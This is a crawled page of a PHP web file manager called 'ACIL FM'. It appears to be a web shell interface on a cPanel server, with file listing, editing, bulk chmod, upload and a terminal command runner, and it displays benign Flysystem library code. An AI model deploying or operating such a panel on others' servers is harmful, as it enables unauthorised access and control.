ACIL FM
Dark
Refresh
Current DIR:
/opt/cpanel/ea-wappspector/vendor/league/flysystem/src/UrlGeneration
/
opt
cpanel
ea-wappspector
vendor
league
flysystem
src
UrlGeneration
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
ChainedPublicUrlGenerator.php
747 B
chmod
View
DL
Edit
Rename
Delete
PrefixPublicUrlGenerator.php
499 B
chmod
View
DL
Edit
Rename
Delete
PublicUrlGenerator.php
313 B
chmod
View
DL
Edit
Rename
Delete
ShardedPrefixPublicUrlGenerator.php
956 B
chmod
View
DL
Edit
Rename
Delete
TemporaryUrlGenerator.php
377 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/cpanel/ea-wappspector/vendor/league/flysystem/src/UrlGeneration/ChainedPublicUrlGenerator.php
<?php declare(strict_types=1); namespace League\Flysystem\UrlGeneration; use League\Flysystem\Config; use League\Flysystem\UnableToGeneratePublicUrl; final class ChainedPublicUrlGenerator implements PublicUrlGenerator { /** * @param PublicUrlGenerator[] $generators */ public function __construct(private iterable $generators) { } public function publicUrl(string $path, Config $config): string { foreach ($this->generators as $generator) { try { return $generator->publicUrl($path, $config); } catch (UnableToGeneratePublicUrl) { } } throw new UnableToGeneratePublicUrl('No supported public url generator found.', $path); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply